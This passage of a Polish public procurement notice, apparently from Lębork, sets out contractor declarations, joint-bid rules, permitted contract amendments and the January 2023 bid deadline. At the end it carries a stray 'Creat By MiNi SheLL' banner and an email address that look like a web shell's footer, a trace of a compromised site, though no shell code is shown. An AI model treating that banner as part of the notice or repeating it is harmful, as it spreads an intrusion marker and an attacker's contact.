wyższych lig.<br/>2.	Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń, określonych w Dziale VII pkt 4.1 SWZ, zgodnie z formułą ,,spełnia – nie spełnia”. <br/> Oceny spełniania warunków udziału w postępowaniu Zamawiający dokona na podstawie złożonych oświadczeń i dokumentów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie Wykonawcy/Podmiotu udostępniającego zasoby w zakresie podstaw wykluczenia z postepowania na podstawie art. 7 ust. 1 UOBN – Załącznik nr 6 do SWZ.<br/>2.Oświadczenie Wykonawcy dotyczące przynależności do grupy kapitałowej– zgodnie z Załącznikiem nr 4 do SWZ. <br/>Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. <br/> W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia każdy z Wykonawców składa osobno w/w oświadczenie. <br/>3.Oświadczenie Wykonawcy/Podmiotu udostępniającego zasoby w zakresie podstaw wykluczenia z postępowania – Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz usług wykonanych w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy (wykaz usług zgodnie z Załącznikiem nr 3 do SWZ). <br/> Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi wykonawcami wykaz usług dotyczyć ma usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył. <br/>2.Oświadczenie Wykonawcy/Podmiotu udostępniającego zasoby dotyczące spełnienia warunku udziału w postępowaniu – według Załącznika nr 2 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Ewentualne pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy. <br/>Pełnomocnictwo winno być załączone do oferty w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym, lub kopii poświadczonej elektronicznie przez notariusza kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym. <br/>2. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania zamawiający może zażądać od wykonawcy odpisu lub informacji z Krajowego Rejestru Sadowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa wyżej, jeśli zamawiający może je uzyskać za pomocą bezpłatnych ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia każdy z Wykonawców składa osobno w/w oświadczenie<br/>3. Zobowiązanie podmiotu trzeciego (załącznik obowiązkowy w przypadku, gdy Wykonawca powołuje się na zasoby innych podmiotów w celu wykazania spełniania warunków udziału w postępowaniu) – zgodnie z Załącznikiem nr 7 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasadami tych podmiotów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku: <br/>1.Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Pełnomocnictwo winno zostać złożone w formie opisanej w pkt. 5.11 ppkt.1 ogłoszenia. <br/>2. W celu potwierdzenia braku podstaw wykluczenia z postępowania każdy z Wykonawców złoży osobno oświadczenie wymienione w pkt. 5.6. ogłoszenia. <br/>3. W celu potwierdzenia spełniania warunków udziału w postępowaniu każdy z Wykonawców złoży osobno dokumenty i oświadczenia wymienione w pkt. 5.7. ogłoszenia w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu <br/>4. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Zamawiający żąda od wykonawcy wspólnie ubiegającego się o udzielenie zamówienia dokumentu, o którym mowa w pkt. 5.11. ppkt.1. ogłoszenia. <br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy. <br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. Wówczas wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <br/>7.Zamawiający nie narzuca osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych etapów realizacji zadania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Poza przypadkami wymienionymi w art. 455 ust. 1 pkt. 2) lit. b i c i 4) oraz ust. 2 ustawy Pzp, przewiduje się możliwość dokonania zmiany istotnych postanowień Umowy (U) w stosunku do treści złożonej oferty, na podstawie której dokonano wyboru Wykonawcy (wyk.) Poniższe postanowienia stanowią dopuszczalny katalog zmian, na które Zamawiający (Zam.) może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Zam. określa następujące warunki zmian istotnych postanowień zawartej U: 1.1. W związku z zawieszeniem realizacji prac projekt. przez Zam. z przyczyn niezależnych od Wyk.. 1.2.W przypadku wystąpienia nieprzewidywanych w momencie zawarcia niniejszej umowy kolizji z planowanymi lub równolegle prowadzonymi przez Zam. lub inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji 1.3.Wystąpieniem okoliczności których Zam. nie był w stanie przewidzieć pomimo zachowania należytej staranności.1.4.Inne przyczyny, za które nie odpowiada Wyk..2.Warunki zmiany w zakresie wysokości wynagrodzenia Wyk.2.1.Zam. określa następujące zasady zmiany U. w wypadku wystąpienia jednej z okoliczności wskazanych w art. 436 pkt 4 lit. b ustawy Pzp w zakresie wynagrodzenia należnego Wyk. w przypadku zmiany:2.1.1.stawki podatku od towarów i usług oraz podatku akcyzowego,2.1.2.wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godz., ustalonych na podstawie ustawy z dnia 10.10.2002 r. o min. wynagrodzeniu za pracę,2.1.3.zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezp. społ. lub ubezp. zdrowotne, 2.1.4.zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 04.10.2018 r. o pracowniczych planach kapitałowych<br/>‒ jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wyk.<br/>2.2.Zmiana wys. wynagrodz. obowiązywać będzie od dnia wejścia w życie zmian o których mowa w pkt. 2.1. Zmiana określ. w 2.1.2, 2.1.3, 2.1.4. może być dokonana nie wcześniej niż po upływie 12 miesięcy od zawarcia umowy lub dokonania ostatniej zmiany ceny. 2.3.W wypadku zmiany, o której mowa w 2.1.1. wartość netto wynagrodzenia Wyk. nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.2.4.W przypadku zmiany, o której mowa w pkt. 2.1.2 wynagrodzenie Wyk. ulegnie zmianie o wartość wzrostu całkowitego kosztu Wyk. wynikającego adekwatnie ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości aktualnie obowiązującego min. wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu min. wynagrodzenia.2.5.W przypadku zmiany, o którym mowa w pkt. 2.1.3 wynagrodzenie Wyk. ulegnie adekwatnie zmianie o wartość wzrostu całkowitego kosztu Wyk., jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zam.<br/>Cały zakres zmian został opisany w SWZ Rodz. XIX INFORMACJE DODATKOWE pkt.od 1 do 5.<br/>3.Dopuszczalne są również zmiany umowy oraz wprowadzenie nowych postanowień do umowy, które będą korzystne dla Zam., a które nie będą wykraczać poza treść oferty, na podstawie której dokonano wyboru Wyk., a zmiany nie będą istotne zgodnie z zapisami art. 454 ustawy Pzp.<br/>4.Ustala się, iż nie stanowi zmiany umowy w rozumieniu art. 454 ustawy Pzp:4.1.Zmiana numeru rach. bank.;4.2.Zmiana danych teleadresowych.Zaistnienie okoliczności, o których mowa w niniejszym punkcie, wymaga jedynie niezwłocznego pisemnego zawiadomienia drugiej Strony.<br/>5.Zamawiający dopuszcza możliwość odstąpienia od umowy zgodnie z art. 456 ust. 1 pkt 1, 2 lit. a) i b) ustawy Pzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-26 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa https://platformazakupowa.pl/pn/lebork</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-26 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com